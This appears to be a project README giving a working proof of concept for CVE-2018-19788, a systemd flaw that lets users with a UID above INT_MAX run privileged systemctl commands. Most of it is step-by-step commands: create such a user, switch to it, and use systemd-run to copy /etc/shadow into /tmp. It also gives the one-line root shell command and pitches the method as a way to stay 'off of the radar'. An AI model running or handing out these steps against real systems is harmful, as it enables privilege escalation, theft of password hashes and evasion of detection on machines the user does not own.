
Leveraging CVE-2018-19788 without root shells

Primary LanguagePython

Leveraging CVE-2018-19788 to dump protected files without root shell

CVE-2018-19788 is an issue where any user with a UID over INT_MAX (IE 4000000000) can run any systemctl command on a systemd linux box, such as Ubuntu. (There is already a writeup to gain a root shell found: here). The main difference between this writeup and the full root shell writeup is that this will be run as the user itself instead of a root user (basically just a PoC to be honest)

Getting /etc/shadow without executing a root shell

To get a root shell it's as simple as running systemd-run -t /bin/bash but if you want to keep off of the radar you can run simple commands to get privileged files without a terminal. Follow these steps to do it:

  • Add a user with a UID above INT_MAX:
    adduser --uid 4000000000 someusername
  • Switch into the user account:
    su someusername
  • Run the command for whatever file you would like (we'll use /etc/shadow for this):
    systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
  • Your file is now in /tmp:
    cat /tmp/results_poc.txt

PoC video
